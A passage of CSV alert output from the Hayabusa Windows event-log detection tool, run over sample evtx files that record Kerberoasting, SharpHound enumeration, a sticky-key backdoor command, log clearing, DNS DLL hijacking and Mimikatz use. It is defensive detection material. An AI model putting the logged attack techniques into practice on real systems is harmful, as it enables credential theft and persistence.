DC-SERVER-1$@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54379 : LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54388 : LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54389 : LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice : Workstation: : IP Address: 192.168.1.200 : Port: 40316 : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.200 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL : Service: sql101 : IP Address: ::ffff:192.168.1.200 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx -2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx -2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62173 : LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62188 : LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62190 : LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62194 : LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62169 : LogonID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62167 : LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62170 : LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62182 : LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62175 : LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62178 : LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62179 : LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62180 : LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62184 : LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62168 : LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62172 : LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62183 : LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62187 : LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62186 : LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62189 : LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62193 : LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62192 : LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62191 : LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62195 : LogonID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62196 : LogonID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62197 : LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62198 : LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62199 : LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62200 : LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62211 : LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62209 : LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62219 : LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62222 : LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62223 : LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62210 : LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62208 : LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62218 : LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62216 : LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62217 : LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62220 : LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62221 : LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62224 : LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62234 : LogonID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62235 : LogonID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62236 : LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\windows\system32\cmd.exe sethc.exe 211 : Path: C:\Windows\System32\cmd.exe : User: OFFSEC\admmig : Parent Command: winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx -2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx -2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx -2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx -2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx -2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: 